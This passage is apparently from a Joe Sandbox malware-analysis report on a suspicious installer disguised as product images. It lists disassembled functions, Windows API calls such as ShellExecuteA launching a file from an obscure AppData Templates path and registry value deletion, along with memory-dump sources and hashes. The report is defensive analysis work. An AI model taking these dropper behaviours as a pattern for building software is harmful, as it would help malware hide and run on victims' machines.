                                                                                      • Opcode Fuzzy Hash: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                                                                      • Instruction Fuzzy Hash: AEF0F472A04205EFE7119F689E8CEBF7A6CEF40348F10483FF105B61C0D6B95E41962A
                                                                                      Function 00405411 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405805: GetFileAttributesA.KERNELBASE(?,?,0040541D,?,?,00000000,00405600,?,?,?,?), ref: 0040580A
                                                                                        • Part of subcall function 00405805: SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040581E
                                                                                      • RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405600), ref: 0040542C
                                                                                      • DeleteFileA.KERNELBASE(?,?,?,00000000,00405600), ref: 00405434
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040544C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                      • String ID:
                                                                                      • API String ID: 1655745494-0
                                                                                      • Opcode ID: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                                                                      • Instruction ID: 50574c3c0a793d880e57543bab2a7873921d7517d00327b94fd9c91dc08ced70
                                                                                      • Opcode Fuzzy Hash: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                                                                      • Instruction Fuzzy Hash: FFE0E53150DA905AC310673089087DB2AD4DF86326F05493AF891B11D1C77848C68ABA
                                                                                      Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,?), ref: 00401E1E
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging, xrefs: 00401E09
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecuteShell
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging
                                                                                      • API String ID: 587946157-2495297767
                                                                                      • Opcode ID: 6b82480460148eba8d5457b1b121f6af4dfa1a379e315f455fd24936478d9cf2
                                                                                      • Instruction ID: 65620240301e045641c79ca9780ea5e083df883982ed968680c53d4afc27f8c5
                                                                                      • Opcode Fuzzy Hash: 6b82480460148eba8d5457b1b121f6af4dfa1a379e315f455fd24936478d9cf2
                                                                                      • Instruction Fuzzy Hash: 43F0F672B041406ACB11ABB5DD8AE6D7BA4DB41318F24093BF150F71C2D9FD88419B18
                                                                                      Function 00402517 Relevance: 3.1, APIs: 2, Instructions: 79fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?,?,?,00000002), ref: 00402563
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileReadwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3326442220-0
                                                                                      • Opcode ID: 071a9315f289c3058708434a5f56a74c9704623313ac53fb04275045a36301de
                                                                                      • Instruction ID: 59a9ffd24257c1493c6120c561a9136e4b4039c8ce9bef0c5d6aa76a01188804
                                                                                      • Opcode Fuzzy Hash: 071a9315f289c3058708434a5f56a74c9704623313ac53fb04275045a36301de
                                                                                      • Instruction Fuzzy Hash: 3421E470D05299FFDF219B948E685AEBB759B01304F14417BF481B62D2D6BC8A81C72D
                                                                                      Function 004023C6 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                                                                      • Instruction ID: 3a9a750c04b5dd3bf1d403560cac254c76a96e884aedd954fc1ce2650bea7c06
                                                                                      • Opcode Fuzzy Hash: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                                                                      • Instruction Fuzzy Hash: CE119E31905205EFDB15DF64CA889AFBBB4EF45344F20843FE446B62C0D2B85A41DB2A
                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                                                      • Instruction ID: 0ac01c35b1a0eb5cd592cd1bd468c7a0eb97994f07403c330b4f6ecb6608de49
                                                                                      • Opcode Fuzzy Hash: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                                                      • Instruction Fuzzy Hash: 7D01F431628210ABE7194B789C04B6A3698E751359F10C23BF911F76F1D67CDC028B4D
                                                                                      Function 004022BE Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022DD
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      • Opcode ID: ef24d438c4dda026042bb148aacc018fe18a7187f4959e07bc3e84ca0d939caf
                                                                                      • Instruction ID: baeefcf9a9db1f94083355b6d21ea7a3e6d609a59d1c11f41be6f028ad682588
                                                                                      • Opcode Fuzzy Hash: ef24d438c4dda026042bb148aacc018fe18a7187f4959e07bc3e84ca0d939caf
                                                                                      • Instruction Fuzzy Hash: DAF0C232A00114ABDB10BBF48F8EEAE72A89B40318F10453BF601B71C1D9FD5E01966E
                                                                                      Function 004019F1 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                                                                      • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStringslstrcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1938659011-0
                                                                                      • Opcode ID: 79b7a0e01db123afcc079197edd82df6480287eb604ff4a0558d32cca6c4bcf2
                                                                                      • Instruction ID: 64e31e8d79c260f471948d3ba476d288fe94427c8d4244796acf024e200d0c72
                                                                                      • Opcode Fuzzy Hash: 79b7a0e01db123afcc079197edd82df6480287eb604ff4a0558d32cca6c4bcf2
                                                                                      • Instruction Fuzzy Hash: D3F0A032F06241EBCB21CF6ADD48AABBFE8DF91350B10803BE549F6290D6788541DB5D
                                                                                      Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00010410), ref: 00401579
                                                                                      • ShowWindow.USER32(0001040C), ref: 0040158E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: add7964105dab1707aaaa84d4f0c0e9d1ab12f2020f5d8ceeb3b73bd8940a280
                                                                                      • Instruction ID: ee0513fff25cb1769eb447bdd8d815014c6f46c9afdd248f46aeede14d5c0a9d
                                                                                      • Opcode Fuzzy Hash: add7964105dab1707aaaa84d4f0c0e9d1ab12f2020f5d8ceeb3b73bd8940a280
                                                                                      • Instruction Fuzzy Hash: 95F0553BA082419FD700CB68EC8086E7BE1EB8630171885BBE101A31C1C2B86E00D718
                                                                                      Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 0401fe0a8408a80830016dcf6a5a76bfc0338b17fffd66502b160acb969e5ee0
                                                                                      • Instruction ID: dacfe0cc3fa15e7f928c0b82e119a982ce74a601eef441543fec6a70ee28c1de
                                                                                      • Opcode Fuzzy Hash: 0401fe0a8408a80830016dcf6a5a76bfc0338b17fffd66502b160acb969e5ee0
                                                                                      • Instruction Fuzzy Hash: A9E0C272A04111DBCB10BBB4AE4AA6E33A4EF0035AB104437F202F10D1D6B99C80966E
                                                                                      Function 0040582A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 0040582E
                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                                                                      • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                                                                      • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
